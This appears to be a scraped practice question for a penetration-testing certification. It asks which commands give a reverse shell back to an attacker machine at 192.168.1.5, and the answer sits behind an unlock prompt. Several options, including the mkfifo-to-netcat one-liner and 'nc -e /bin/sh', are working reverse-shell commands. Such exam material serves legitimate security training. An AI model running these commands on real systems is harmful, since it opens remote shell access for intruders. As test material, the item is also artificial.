During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO) .
A) nc 192.168.1.5 44444
B) nc -nlvp 44444 -e /bin/sh
C) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
D) nc -e /bin/sh 192.168.1.5 44444
E) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
F) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
Correct Answer:
Verified
Q131: Which of the following is an example
Q132: A penetration tester wants to script out
Q133: A security consultant receives a document outlining
Q134: A penetration tester is performing a remote
Q135: If a security consultant comes across a
Q137: A penetration tester is performing a black
Q138: A penetration tester reviews the scan results
Q139: A company contracted a firm specializing in
Q140: A penetration tester reports an application is
Q141: In which of the following scenarios would
Unlock this Answer For Free Now!
View this answer and more for free by performing one of the following actions
Scan the QR code to install the App and get 2 free unlocks
Unlock quizzes for free by uploading documents